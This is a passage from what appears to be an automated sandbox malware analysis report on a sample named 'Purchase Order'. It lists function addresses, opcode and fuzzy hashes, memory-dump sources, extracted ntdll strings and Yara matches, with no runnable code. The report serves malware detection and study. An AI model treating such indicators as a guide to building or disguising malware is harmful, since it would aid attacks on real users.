                                                            • Instruction ID: 5d9c7b8bf1bef92e38af7e0338cf9d089849895ea98d29e7f2c854eb05e64963
                                                            • Opcode Fuzzy Hash: a75e5224ba9c146593dc3a6e2f690f6c9d60b4c6373b1dce5d57aca229deffd7
                                                            • Instruction Fuzzy Hash: 2F90022130140406D10271584854646000DD7D2345F95D012E2429565DC6258B5BA633
                                                            Function 018A3090 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3bb817cd96746a3126095dfab62f59c494724ba4a229dc059ecc3d5945485abf
                                                            • Instruction ID: 2e18b69970a9b80ff06336e79b669f291bf21ed2385868fdd946923bd503c9aa
                                                            • Opcode Fuzzy Hash: 3bb817cd96746a3126095dfab62f59c494724ba4a229dc059ecc3d5945485abf
                                                            • Instruction Fuzzy Hash: 8E90022124140806D14071588854747000AD7D1701F55D011A1029564DC6168B6D6BB2
                                                            Function 018A3010 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5c122689344fd0ebc2a56d8477b72818b2a52bfe4a83ee9a715e515465ee96d4
                                                            • Instruction ID: 43120a35a0552f68918f9c1dd2b7ce62025e8bd8655cbc71e4f82d29dc80b8b2
                                                            • Opcode Fuzzy Hash: 5c122689344fd0ebc2a56d8477b72818b2a52bfe4a83ee9a715e515465ee96d4
                                                            • Instruction Fuzzy Hash: F690022120184446D14072584C44B4F410997E2302F95D019A515B564CC9158A5D5B22
                                                            Function 018A39B0 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d20969f2f34960f8fa1c76623e348aee613b52686794904b3fb0d6d285841fc1
                                                            • Instruction ID: 03fb01c8d083812bdd08ced3b476842ff8550d0684e31d92c961884c174d83ad
                                                            • Opcode Fuzzy Hash: d20969f2f34960f8fa1c76623e348aee613b52686794904b3fb0d6d285841fc1
                                                            • Instruction Fuzzy Hash: 3290022124545106D150715C48446564009B7E1301F55D021A18195A4DC5558A5D6722
                                                            Function 018A3D10 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b37f364ca163028ba253ab1d22f038758803670b358deb205e62f1d62352a661
                                                            • Instruction ID: 3a8e21d84fdf1755b4dec124c85d9216e3c16341bd75099d64a15e78b608c61b
                                                            • Opcode Fuzzy Hash: b37f364ca163028ba253ab1d22f038758803670b358deb205e62f1d62352a661
                                                            • Instruction Fuzzy Hash: 5390023120240146954072585C44A8E410997E2302B95E415A101A564CC9148A695722
                                                            Function 018A3D70 Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5cc6a4510069606777bcf91a2d633b1669fd70434116aa00c35ac2bce67951ab
                                                            • Instruction ID: 1ce540b83ec17c33dd2d196772abd6e623911758becf7e635d104e992c14fad8
                                                            • Opcode Fuzzy Hash: 5cc6a4510069606777bcf91a2d633b1669fd70434116aa00c35ac2bce67951ab
                                                            • Instruction Fuzzy Hash: 5F90023520140406D51071585C44686004A97D1301F55E411A1429568DC6548AA9A622
                                                            Function 018A2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                            • Instruction ID: 495660c6c6ebb40cda5277ddaf59ab26478b30a0221369676ecf7f655a56e0dd
                                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                            • Instruction Fuzzy Hash:
                                                            Function 018A2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                            • API String ID: 48624451-2108815105
                                                            • Opcode ID: 4a32caf65a3db453b981b226abc97aea5978002fcff4fb4f17607b8c7e2b913d
                                                            • Instruction ID: 405ee2b63be1e87b99eaef81be36d9ad88f1dac0735e08896355a61e03d99192
                                                            • Opcode Fuzzy Hash: 4a32caf65a3db453b981b226abc97aea5978002fcff4fb4f17607b8c7e2b913d
                                                            • Instruction Fuzzy Hash: E851F9B2A0021ABFDB25DB9C89D097EFBB9BB48740B948229F495D7641D334DF0087E0
                                                            Function 01912410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                            • API String ID: 48624451-2108815105
                                                            • Opcode ID: 59e87a61eb011a6e1281cd7d3359bc124b418f3f77e41ab29b1dd28dbb22841a
                                                            • Instruction ID: 85f3fb51820a1b5a50e0cc5f3b2a7220a4ebc6063d379fe2a95485a3a8fa7039
                                                            • Opcode Fuzzy Hash: 59e87a61eb011a6e1281cd7d3359bc124b418f3f77e41ab29b1dd28dbb22841a
                                                            • Instruction Fuzzy Hash: 97512A71A006496ECB30EF5CC9D087FB7FCEB44301B648869F59AD7685E674DA808760
                                                            Function 01897630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • Execute=1, xrefs: 018D4713
                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 018D4787
                                                            • ExecuteOptions, xrefs: 018D46A0
                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 018D46FC
                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 018D4655
                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 018D4725
                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 018D4742
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                            • API String ID: 0-484625025
                                                            • Opcode ID: e574790721ea0dbc361ba05222f98e1319ad9ffc8d9ff3a8e79e129f4d1ec3dd
                                                            • Instruction ID: 672e325399dc7e4e60828f12a082a32e844e3b8c2cf5da90e6cdca7e4f7c3457
                                                            • Opcode Fuzzy Hash: e574790721ea0dbc361ba05222f98e1319ad9ffc8d9ff3a8e79e129f4d1ec3dd
                                                            • Instruction Fuzzy Hash: 3251093165021D7BEF21AFA8DC89FAD77A8AF55304F0800A9D605EB181EB70AB45CF95
                                                            Function 018AB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: __aulldvrm
                                                            • String ID: +$-$0$0
                                                            • API String ID: 1302938615-699404926
                                                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                            • Instruction ID: 3b5e5b8a5e5c4832d1f5056523aa9ef1fc3ed7699cd2bc86bae7de93d48bcdca
                                                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                            • Instruction Fuzzy Hash: CD81AF70E052499FFF298E6CC8917FEBFB1AF45360F984219D861E7291C7749A40CB51
                                                            Function 019120E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: %%%u$[$]:%u
                                                            • API String ID: 48624451-2819853543
                                                            • Opcode ID: b857b117e89db5b7dc6a2dd863d5ab5e285adf1dcf5d46506b0794b26016388a
                                                            • Instruction ID: ad5e58f75c554b30c5e7a9618ea15bd7f6ff8762533bc1d7881886703d0900a9
                                                            • Opcode Fuzzy Hash: b857b117e89db5b7dc6a2dd863d5ab5e285adf1dcf5d46506b0794b26016388a
                                                            • Instruction Fuzzy Hash: 3F214F7AA0011DABDB11EF69C840AEEBBFDEF54754F580126E909E3204E730DA418BA1
                                                            Function 0188F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018D02BD
                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018D02E7
                                                            • RTL: Re-Waiting, xrefs: 018D031E
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                            • API String ID: 0-2474120054
                                                            • Opcode ID: 3aea30c28acdaaa878c568356c621fe7c82970f05415f022188b928b6445fc89
                                                            • Instruction ID: 3b45dea7df11fddf30f3819c062f054df513c34675e45dda47f8d9c59d0cc6e6
                                                            • Opcode Fuzzy Hash: 3aea30c28acdaaa878c568356c621fe7c82970f05415f022188b928b6445fc89
                                                            • Instruction Fuzzy Hash: E5E18C306087429FE725EF2CC884B2ABBE0BB85318F140A5DF6A5CB2D1D774DA45CB52
                                                            Function 0189BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 018D7B7F
                                                            • RTL: Resource at %p, xrefs: 018D7B8E
                                                            • RTL: Re-Waiting, xrefs: 018D7BAC
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                            • API String ID: 0-871070163
                                                            • Opcode ID: cf74e81820845e573b8a1d2074f7d1feced16db1120b2f08a8066888cd67b14d
                                                            • Instruction ID: 414991d08dccdf6cbbcd1bdd8a0a42e348d372938281198ce2f5ddb56376c209
                                                            • Opcode Fuzzy Hash: cf74e81820845e573b8a1d2074f7d1feced16db1120b2f08a8066888cd67b14d
                                                            • Instruction Fuzzy Hash: 924104313007069FDB20DE29D840F6AB7E5EF89714F140A1DFA5ADB780DB71EA058B91
                                                            Function 0189B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018D728C
                                                            Strings
                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 018D7294
                                                            • RTL: Resource at %p, xrefs: 018D72A3
                                                            • RTL: Re-Waiting, xrefs: 018D72C1
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                            • API String ID: 885266447-605551621
                                                            • Opcode ID: be0e6ca860be2148885babd6cf124c434543861580e76c2b1cee43e286543ad9
                                                            • Instruction ID: 57be1ebb26e989b460472533eee0e708e4eb18a5e7b9830f888afb4b745bf629
                                                            • Opcode Fuzzy Hash: be0e6ca860be2148885babd6cf124c434543861580e76c2b1cee43e286543ad9
                                                            • Instruction Fuzzy Hash: B5411131700346ABDB21DE29CC81F6AB7A5FF95718F140619FA56EB240DB31FA428BD1
                                                            Function 01912300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: %%%u$]:%u
                                                            • API String ID: 48624451-3050659472
                                                            • Opcode ID: c4bb41950e83d5ef92e719e0ba6fa357ff93f6320842bf954dc9e15d0cb5587e
                                                            • Instruction ID: 57d9816d619ef909ceb83edff5f3d2c2647594135042fae8198bdd361d9d11c3
                                                            • Opcode Fuzzy Hash: c4bb41950e83d5ef92e719e0ba6fa357ff93f6320842bf954dc9e15d0cb5587e
                                                            • Instruction Fuzzy Hash: 44317372A002199FDB20DF2DCC40BEEB7B8EB54751F940555E949E3244EB30AA458BA1
                                                            Function 018A7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: __aulldvrm
                                                            • String ID: +$-
                                                            • API String ID: 1302938615-2137968064
                                                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                            • Instruction ID: d3f2071d455bc2b0fa9422c931d90c9982220fcece1d1d376b2a8de536508cbb
                                                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                            • Instruction Fuzzy Hash: 5391C571E0020A9BFF24DF6DC8806BEBBB5AF44720F94451AEA55E72C4E7728B409761
                                                            Function 01869126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $$@
                                                            • API String ID: 0-1194432280
                                                            • Opcode ID: 36f474deb1c9c282b4d2f9cd221f0a94258abc5044f7f57fbfe66fc818f720c4
                                                            • Instruction ID: 52043a69ad0d5edee13e60bd6cc29fda7bf025da813aa1335014c7a95a6ec065
                                                            • Opcode Fuzzy Hash: 36f474deb1c9c282b4d2f9cd221f0a94258abc5044f7f57fbfe66fc818f720c4
                                                            • Instruction Fuzzy Hash: 67810B71D00269DBDB25DB58CC44BEAB7B8AB48714F0041DAEA19F7280D7309F85CF61
                                                            Function 018ECEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 018ECFBD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: CallFilterFunc@8
                                                            • String ID: @$@4Qw@4Qw
                                                            • API String ID: 4062629308-2383119779
                                                            • Opcode ID: 931399416f48912549ea00024453760fa6a4e56add185580874ec6276ccd91d5
                                                            • Instruction ID: 2507c04d562dcbdda05d1fb84761473ab54084bd2f2e30c60206b8345d6c1035
                                                            • Opcode Fuzzy Hash: 931399416f48912549ea00024453760fa6a4e56add185580874ec6276ccd91d5
                                                            • Instruction Fuzzy Hash: DD41AE71900219DFDB21DFA9C844AAEBBF8FF95B40F04412AE905EB254E770DA05CB62

                                                            Executed Functions

                                                            Function 03A5FBB2 Relevance: 25.4, Strings: 20, Instructions: 356COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: j$$=$($8^$=$L7$O5$Z$[$[$[5$]$d&$fX$k^$q$sw$y$}$4
                                                            • API String ID: 0-2360868250
                                                            • Opcode ID: 85edb4427501362f91567d6807435bff14aaa73594397eb8973f0ba859faa158
                                                            • Instruction ID: b2c1f0ab0af377446ab5767e29aa0833986f0613c61edf7a6f1137939c3eb74c
                                                            • Opcode Fuzzy Hash: 85edb4427501362f91567d6807435bff14aaa73594397eb8973f0ba859faa158
                                                            • Instruction Fuzzy Hash: 0E02F3B0E05228CFEB28CF49C954BDDBBB2BF45308F1481DAD54AAB285C7B51A85CF51
                                                            Function 03A6D622 Relevance: 6.4, Strings: 5, Instructions: 153COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 6$O$S$\$s
                                                            • API String ID: 0-3854637164
                                                            • Opcode ID: b7d0034783b993231ae93bba56965397c5b8b96306e4b5aa6429389a8463abe2
                                                            • Instruction ID: 11a988f262931a35da26609255f7618cc03ad99f407a6fee877792c0378b7ffa
                                                            • Opcode Fuzzy Hash: b7d0034783b993231ae93bba56965397c5b8b96306e4b5aa6429389a8463abe2
                                                            • Instruction Fuzzy Hash: E251CAB6D01318AFDB10EF94DD89EEEB378EF44311F14819AED085B201F7749A088BA1
                                                            Function 03A7A8B2 Relevance: 2.5, Strings: 2, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: "1$~!
                                                            • API String ID: 0-4146445991
                                                            • Opcode ID: 639cc635f774ca0338b75a683a153f6e21b4ced9507b621540147d22da56499b
                                                            • Instruction ID: 220f95279b46d4456f0e79389036b57063c59ac590c2c1ea5cf4537a2b57c62c
                                                            • Opcode Fuzzy Hash: 639cc635f774ca0338b75a683a153f6e21b4ced9507b621540147d22da56499b
                                                            • Instruction Fuzzy Hash: 0301D7B6D0121CAE9B50DFE8D9419EEBBF8AB18200F14856AE905F7240F7749A048BA0
                                                            Function 03A7A942 Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: "
                                                            • API String ID: 0-1165748306
                                                            • Opcode ID: 9a43477422ecfde0ed53a9224819f6ab075015e11c3c32de38f19afbf712c515
                                                            • Instruction ID: 86a2c14f9ded7c471030dbb0721cd23d3b6054fa0343303c5562f40b02a3d3a1
                                                            • Opcode Fuzzy Hash: 9a43477422ecfde0ed53a9224819f6ab075015e11c3c32de38f19afbf712c515
                                                            • Instruction Fuzzy Hash: AE21F1B6D0121DAF8B00DFE9D9419EFB7F9EF48210F14415AE915E7200E7719A148BA0
                                                            Function 03A7AE32 Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: H
                                                            • API String ID: 0-198657301
                                                            • Opcode ID: 8a3b2ebfe9411b7b50762135d2d539b95a6b20192640d762479a6f27ef957061
                                                            • Instruction ID: 67a93503cc815921a68ef3260db9426f7960b35e504533f570798197f5c71b11
                                                            • Opcode Fuzzy Hash: 8a3b2ebfe9411b7b50762135d2d539b95a6b20192640d762479a6f27ef957061
                                                            • Instruction Fuzzy Hash: 022100B6D0121CAF9B04DFA9D9419EFB7F9EF48210F14856EE919E7200E7759A048BA0
                                                            Function 03A7BC82 Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 6r
                                                            • API String ID: 0-1993249690
                                                            • Opcode ID: 5a475c1fd64906f5f025767121e17dd43e83d4b976390659b15a8ec84352b1bd
                                                            • Instruction ID: e510a75c9f86863045aa53a1bbb8e80eb3448d3277ea93277c721f06b3f1c5fd
                                                            • Opcode Fuzzy Hash: 5a475c1fd64906f5f025767121e17dd43e83d4b976390659b15a8ec84352b1bd
                                                            • Instruction Fuzzy Hash: 401112B6D0121CAF9B00DFE9D9419EEB7F9EF49210F14416AE909E7200E7759A04CBE1
                                                            Function 03A7B592 Relevance: 1.3, Strings: 1, Instructions: 61COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: L
                                                            • API String ID: 0-1331423761
                                                            • Opcode ID: de2cd38af876d28ea3ba09e5bffd043f3f6078b0483c65775d67ea22b5f08749
                                                            • Instruction ID: 0028dff49287054d0413dd1e3d64bc03c9aaf77a352464e1f8019c96e87fcd06
                                                            • Opcode Fuzzy Hash: de2cd38af876d28ea3ba09e5bffd043f3f6078b0483c65775d67ea22b5f08749
                                                            • Instruction Fuzzy Hash: 1111FEB6D0121CAF9B50DFE9DD419EEBBF9EF48210F14456AE919E7200E7745A048BA0
                                                            Function 03A591E2 Relevance: .1, Instructions: 130COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bd0e62b92b572c76d56d7b34eccc94ad5fc6bfe904389b2352d80dc92fe27d58
                                                            • Instruction ID: b155931af351b680ea38952430349e526454b6ec303c555acd2ddcab986fc40c
                                                            • Opcode Fuzzy Hash: bd0e62b92b572c76d56d7b34eccc94ad5fc6bfe904389b2352d80dc92fe27d58
                                                            • Instruction Fuzzy Hash: 6C410EB1D11218AFDB04CF99CC81AEEBBBCFF49710F10415AF918EA240E7B49641CBA4
                                                            Function 03A7E642 Relevance: .1, Instructions: 101COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 308ac50792df477026cb561dcc4cf68acc9d51b989d0347635f238ba06fcb5ac
                                                            • Instruction ID: 6c7678dc7237338d386c32f17c7900f6af780b8245321539f8a3c759d427059f
                                                            • Opcode Fuzzy Hash: 308ac50792df477026cb561dcc4cf68acc9d51b989d0347635f238ba06fcb5ac
                                                            • Instruction Fuzzy Hash: 8531D8B5A01648AFDB54DF99D980EEEB7F9EF8C310F108619F919A7340D730A941CBA4
                                                            Function 03A7E7B2 Relevance: .1, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2661831862.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_39e0000_jfBrBcvTIMPfDU.jbxd
                                                            Yara matches
